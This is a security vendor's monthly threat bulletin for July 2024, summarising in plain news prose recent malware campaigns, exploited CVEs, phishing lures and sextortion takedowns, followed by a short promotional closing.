Threat Pulse – July 2024
Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats.
If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.
DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available.
North Korea-Linked Malware Targets Developers
A North Korea-linked malware campaign, dubbed DEV#POPPER, is targeting software developers across Windows, Linux, and macOS systems.
This sophisticated attack uses social engineering tactics, posing as job interviewers to trick victims into downloading malicious software from GitHub. The malware, including updated versions like BeaverTail and the Python-based InvisibleFerret, exfiltrates sensitive data, accesses cookies, executes commands, and logs keystrokes.
Enhanced obfuscation, AnyDesk software for persistence, and robust data exfiltration mechanisms are notable features of this ongoing threat.
SideWinder Cyber Attacks Target Maritime Facilities
The SideWinder threat actor, affiliated with India, has launched a new cyber espionage campaign targeting maritime facilities in the Indian Ocean and Mediterranean Sea.
Using spear-phishing techniques with lures related to sexual harassment and employee termination, the attackers exploit known Microsoft Office vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to deploy malicious payloads.
This campaign affects countries like Pakistan, Egypt, and Sri Lanka, aiming for intelligence gathering. The ongoing evolution of SideWinder’s tactics indicates continued attacks in the future.
VMware ESXi Flaw Exploited by Ransomware Groups
Ransomware groups are exploiting a recently patched security flaw in VMware ESXi hypervisors, identified as CVE-2024-37085, to gain administrative access and deploy ransomware such as Akira and Black Basta.
The vulnerability allows attackers to bypass Active Directory authentication, elevating privileges by recreating or renaming the “ESX Admins” group.
Threat actors including Storm-0506 and Storm-1175 leverage this flaw for data exfiltration and lateral movement within compromised networks, highlighting the need for immediate patching and enhanced security measures.
New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk
A newly discovered vulnerability in OpenSSH, tracked as CVE-2024-6409, poses a potential remote code execution (RCE) risk.
This flaw, affecting versions 8.7p1 and 8.8p1 on Red Hat Enterprise Linux 9, is due to a race condition in signal handling within the privsep child process.
This vulnerability shares similarities with CVE-2024-6387 but impacts processes with reduced privileges. An active exploit for CVE-2024-6387 has been observed, emphasising the need for immediate mitigation.
Cybercriminals Exploit CrowdStrike Update Mishap to Spread Remcos RAT Malware
Cybercriminals are exploiting a recent CrowdStrike update mishap to distribute Remcos RAT malware.
Following an IT disruption caused by a flawed update, attackers are targeting CrowdStrike’s Latin American customers with a fake “crowdstrike-hotfix.zip” file. This file contains a malware loader that launches the Remcos RAT payload.
The phishing campaign uses Spanish instructions to deceive users into running the malicious executable. CrowdStrike advises affected customers to communicate through official channels and follow provided technical guidance.
Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers
A now-patched vulnerability in Microsoft Defender SmartScreen (CVE-2024-21412) has been exploited to distribute ACR Stealer, Lumma, and Meduza malware.
Fortinet FortiGuard Labs identified this campaign targeting Spain, Thailand, and the U.S., using booby-trapped files to bypass SmartScreen protection. Attackers trick users into downloading an LNK file, which then executes malicious payloads via an HTML Application script.
This vulnerability was addressed in Microsoft’s February 2024 update. Users should ensure their systems are updated and exercise caution when downloading files.
OneDrive Phishing Scam Tricks Users into Running Malicious PowerShell Script
Cybersecurity researchers have identified a new phishing campaign targeting Microsoft OneDrive users with a malicious PowerShell script, dubbed “OneDrive Pastejacking.
This sophisticated attack employs social engineering tactics, tricking users into executing a PowerShell script under the guise of fixing a DNS error. The attack is initiated via an email containing an HTML file that mimics a OneDrive page, prompting users to run a Base64- encoded command in PowerShell. The command flushes the DNS, creates a directory, downloads, and executes a malicious script.
This campaign has targeted users in several countries, including the U.S., South Korea, and Germany. Similar phishing tactics have been reported, often involving bogus Windows shortcut files and Microsoft Office Forms to steal credentials.
Attackers exploit Secure Email Gateways (SEGs) by disguising malicious files, such as using ZIP archives with misleading headers to bypass detection. This underscores the evolving nature of phishing threats and the ongoing efforts by adversaries to evade security measures.
Meta Removes 63,000 Instagram Accounts Linked to Nigerian Sextortion Scams
Meta Platforms announced the removal of about 63,000 Instagram accounts in Nigeria involved in financial sextortion scams.
A coordinated network of around 2,500 accounts linked to 20 individuals primarily targeted adult men in the U.S. and, in some cases, minors, which were reported to the National Center for Missing and Exploited Children.
Additionally, Meta removed 7,200 assets, including Facebook accounts, pages, and groups used to train and recruit scammers.
This network, attributed to the cybercrime group Yahoo Boys, had previously targeted teenagers in Australia, Canada, and the U.S.
Meta has implemented new methods to detect sextortion activities. Meanwhile, INTERPOL’s global operation Jackal III led to 300 arrests and the seizure of $3 million in assets, targeting West African crime groups involved in various crimes, including cyber fraud.
Other international law enforcement actions included significant arrests and takedowns related to cybercrime and DDoS-for-hire services.
Telegram App Flaw Exploited to Spread Malware Hidden in Videos
A zero-day security flaw named EvilVideo in Telegram’s Android app allowed attackers to distribute malicious files disguised as harmless videos. The exploit, which appeared for sale on an underground forum on June 6, 2024, was addressed by Telegram on July 11 in version 10.14.5.
Attackers used Telegram’s API to camouflage malicious APK files as 30 second videos, tricking users into installing them by displaying a fake error message. The attack targeted Telegram’s mobile app for Android, but not its web or Windows clients.
The exploit’s reach and origins remain unclear, but similar tactics have been used by other cybercriminals, such as distributing fake Hamster Kombat apps to deploy malware.
Telegram implemented a server-side fix, while Google emphasized that Google Play Protect can safeguard users against such threats.
DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, whilst you take care of business.
Talk to the team to see how you can start protecting your business against cyberattacks today.